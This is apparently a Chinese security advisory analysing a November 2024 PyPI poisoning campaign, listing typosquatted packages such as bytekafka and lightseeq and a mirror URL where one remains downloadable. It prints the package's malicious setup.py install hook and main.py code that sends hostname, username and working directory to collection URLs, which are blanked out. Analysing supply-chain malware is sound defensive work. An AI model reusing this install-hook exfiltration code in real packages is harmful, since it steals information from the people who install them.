2024年11月15日在Python官方仓库发现下面一批具有共性的投毒组件:
- lightseeq、lightsequ、lightseqe
- bytekafka-0.0.15、bytekafka、bytekafka-0.15
- ASLMutetion、v2xlm-gml、v2mlx-gml、x2vml-gml
- BabetMF、BaibitMF、BebitMF
- nurst、nerst、nuest、nuerst
- byteseep、bytesip、bytesap
这批恶意组件用于进行信息收集,大概发布一天后就被pypi官方下架,但仍可在腾讯云PyPI镜像站下载,如:https://mirrors.cloud.tencent.com/pypi/simple/bytekafka/
投毒代码分析
以 bytekafka 投毒包为例,攻击者在包中植入了恶意代码,具体代码如下:
//setup.py
from setuptools import setup, find_packages
from setuptools.command.install import install
class CrazyInstallStrat(install):
def run(self):
install.run(self)
from main import main
main()
setup(
name="bytekafka",
version="99.7",
author="x",
author_email="xxx@outlook.com",
description="x",
long_description_content_type="text/markdown",
long_description="xxx",
cmdclass={
'install': CrazyInstallStrat,
},
install_requires=['requests'],
setup_requires=['setuptools']
)//main.py
def main():
hostname = platform.node()
username = getpass.getuser()
current_path = os.getcwd()
rd_num = random.randint(10000, 99999)
urls = [
//信息收集url地址
]
for url in urls:
params = {
"packagename": "bytekafka",
"hostname": hostname,
"user": username,
"path": current_path
}
full_url = f"{url}/realtime_p/pypi/{rd_num}?{urllib.parse.urlencode(params)}"
try:
with urllib.request.urlopen(full_url) as response:
logging.info(response.read().decode())
except Exception as e:
logging.error(f"Could not reach {url}: {e}")当用户通过pip install安装投毒包触发setup.py中的钩子函数,调用main.py中的main方法,进而窃取用户的主机名、用户名、工作目录和IP地址信息。
